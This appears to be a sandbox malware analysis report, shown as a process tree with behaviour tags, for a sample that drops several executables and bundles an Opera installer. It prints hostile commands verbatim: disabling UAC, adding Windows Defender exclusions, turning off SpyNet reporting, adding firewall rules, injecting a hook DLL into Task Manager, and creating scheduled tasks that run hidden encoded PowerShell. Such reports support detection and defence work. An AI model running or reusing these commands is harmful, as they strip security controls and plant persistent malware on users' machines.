ZEg1uS8vn7QD2IVsRMo1jWM1.exe 334 PID 3184 wrote to memory of 1324 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 334 PID 1092 wrote to memory of 4060 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 211 PID 1092 wrote to memory of 4060 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 211 PID 1092 wrote to memory of 4060 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 211 PID 3724 wrote to memory of 316 3724 CasPol.exe 220 PID 3724 wrote to memory of 316 3724 CasPol.exe 220 PID 3724 wrote to memory of 316 3724 CasPol.exe 220 PID 3724 wrote to memory of 5012 3724 CasPol.exe 224 PID 3724 wrote to memory of 5012 3724 CasPol.exe 224 PID 3724 wrote to memory of 5012 3724 CasPol.exe 224 PID 316 wrote to memory of 3656 316 A1HsF0110Frlw0UEi4q0k6Xb.exe 223 PID 316 wrote to memory of 3656 316 A1HsF0110Frlw0UEi4q0k6Xb.exe 223 PID 316 wrote to memory of 3656 316 A1HsF0110Frlw0UEi4q0k6Xb.exe 223 PID 5012 wrote to memory of 4368 5012 tLvV5rbdoB7aj6jWYBj2thyy.exe 269 PID 5012 wrote to memory of 4368 5012 tLvV5rbdoB7aj6jWYBj2thyy.exe 269 PID 5012 wrote to memory of 4368 5012 tLvV5rbdoB7aj6jWYBj2thyy.exe 269 PID 3656 wrote to memory of 4296 3656 Install.exe 230 PID 3656 wrote to memory of 4296 3656 Install.exe 230 PID 3656 wrote to memory of 4296 3656 Install.exe 230 PID 4296 wrote to memory of 4644 4296 Install.exe 298 PID 4296 wrote to memory of 4644 4296 Install.exe 298 PID 4296 wrote to memory of 4644 4296 Install.exe 298 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe"C:\Users\Admin\AppData\Local\Temp\3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe"1⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Users\Admin\Pictures\ZEg1uS8vn7QD2IVsRMo1jWM1.exe"C:\Users\Admin\Pictures\ZEg1uS8vn7QD2IVsRMo1jWM1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 3724⤵
- Program crash
PID:2224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 3884⤵
- Program crash
PID:1100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 6724⤵
- Program crash
PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 7484⤵
- Program crash
PID:4596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 7564⤵
- Program crash
PID:3276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 6844⤵
- Program crash
PID:412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 7724⤵
- Program crash
PID:4328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 6844⤵
- Program crash
PID:4772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 6524⤵
- Program crash
PID:4700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 8964⤵
- Program crash
PID:3572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 7284⤵
- Program crash
PID:4936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 7804⤵
- Program crash
PID:3192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 7644⤵
- Program crash
PID:5020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 8964⤵
- Program crash
PID:208
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 9244⤵
- Program crash
PID:220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 8684⤵
- Program crash
PID:3344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 9124⤵
- Program crash
PID:2796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 6844⤵
- Program crash
PID:2184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 3924⤵
- Program crash
PID:4272
-
-
C:\Users\Admin\Pictures\ZEg1uS8vn7QD2IVsRMo1jWM1.exe"C:\Users\Admin\Pictures\ZEg1uS8vn7QD2IVsRMo1jWM1.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 3405⤵
- Program crash
PID:1204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 3565⤵
- Program crash
PID:2712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 6645⤵
- Program crash
PID:1804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 6645⤵
- Program crash
PID:3712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 6525⤵
- Program crash
PID:1468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 7285⤵
- Program crash
PID:5012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 7485⤵
- Program crash
PID:3076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 7205⤵
- Program crash
PID:920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 3685⤵
- Program crash
PID:1908
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4992
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4248
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 5925⤵
- Program crash
PID:4936
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 8605⤵
- Program crash
PID:3572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 6045⤵
- Program crash
PID:1468
-
-
-
-
C:\Users\Admin\Pictures\TzWEsjzZHXRT2qZRVwsfHlsJ.exe"C:\Users\Admin\Pictures\TzWEsjzZHXRT2qZRVwsfHlsJ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 3724⤵
- Program crash
PID:2448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 3884⤵
- Program crash
PID:992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 7284⤵
- Program crash
PID:3556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 6804⤵
- Program crash
PID:316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 4004⤵
- Program crash
PID:860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 7284⤵
- Program crash
PID:5056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 7564⤵
- Program crash
PID:212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 7684⤵
- Program crash
PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 8004⤵
- Program crash
PID:3256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 9204⤵
- Program crash
PID:1204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 8364⤵
- Program crash
PID:668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 7964⤵
- Program crash
PID:4960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 9244⤵
- Program crash
PID:4284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 9204⤵
- Program crash
PID:5060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 9764⤵
- Program crash
PID:2088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 6204⤵
- Program crash
PID:1800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 7484⤵
- Program crash
PID:1092
-
-
C:\Users\Admin\Pictures\TzWEsjzZHXRT2qZRVwsfHlsJ.exe"C:\Users\Admin\Pictures\TzWEsjzZHXRT2qZRVwsfHlsJ.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 3405⤵
- Program crash
PID:3156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 3445⤵
- Program crash
PID:4368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 3605⤵
- Program crash
PID:4820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 6885⤵
- Program crash
PID:5056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 6885⤵
- Program crash
PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 7245⤵
- Program crash
PID:1836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 7445⤵
- Program crash
PID:3692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 7605⤵
- Program crash
PID:2128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 6485⤵
- Program crash
PID:3328
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:376
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4772
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2712
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3726⤵
- Program crash
PID:1376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3886⤵
- Program crash
PID:3900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 4006⤵
- Program crash
PID:2604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 7446⤵
- Program crash
PID:2036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 7686⤵
- Program crash
PID:2896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 7766⤵
- Program crash
PID:3620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 7686⤵
- Program crash
PID:2604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 7246⤵PID:2040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6886⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6246⤵PID:2456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 8886⤵PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 9166⤵PID:1804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1908
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:772
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 8406⤵PID:4948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 9446⤵PID:3156
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 9726⤵PID:2232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 9406⤵PID:5056
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Drops file in System32 directory
- Creates scheduled task(s)
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:1548 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2132
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 11526⤵PID:4484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 11686⤵PID:3484
-
-
-
-
-
C:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exe"C:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exeC:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f0,0x6fca9558,0x6fca9564,0x6fca95704⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\bZqLb8FuXLk6j9hSMqddSMxk.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\bZqLb8FuXLk6j9hSMqddSMxk.exe" --version4⤵PID:4368
-
-
C:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exe"C:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1896 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204075408" --session-guid=566146ae-787b-4487-af28-c3cc3a841766 --server-tracking-blob=MTU5NjAxOGM0ZjcwODFjYjAzZmVjNTY2ZGNlNzQ5MWZhNTRmMzc3MTUxMGJiMWExZjczZDMyYTE2NjA4NGQ4MDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzAzMzI0Ni4xODIwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI2NTg3M2E3ZC01NmE1LTQzMzAtYmNiMS0wMzA4YzU4YTE2YmQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=FC040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exeC:\Users\Admin\Pictures\bZqLb8FuXLk6j9hSMqddSMxk.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2c4,0x300,0x6ed89558,0x6ed89564,0x6ed895705⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4416
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040754081\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040754081\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:816
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040754081\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040754081\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4804
-
-
-
C:\Users\Admin\Pictures\aVU6bd6xD7Lia80sIyAQMJAY.exe"C:\Users\Admin\Pictures\aVU6bd6xD7Lia80sIyAQMJAY.exe"3⤵
- Executes dropped EXE
PID:2724
-
-
C:\Users\Admin\Pictures\A1HsF0110Frlw0UEi4q0k6Xb.exe"C:\Users\Admin\Pictures\A1HsF0110Frlw0UEi4q0k6Xb.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Users\Admin\AppData\Local\Temp\7zS8CEE.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Users\Admin\AppData\Local\Temp\7zS9097.tmp\Install.exe.\Install.exe /gdidR "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:4644
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:4368
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:4384
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:4772
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:2608
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:4972
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:4320
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:1100
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxuDNDCYP" /SC once /ST 00:47:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:1376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxuDNDCYP"6⤵PID:3256
-
-
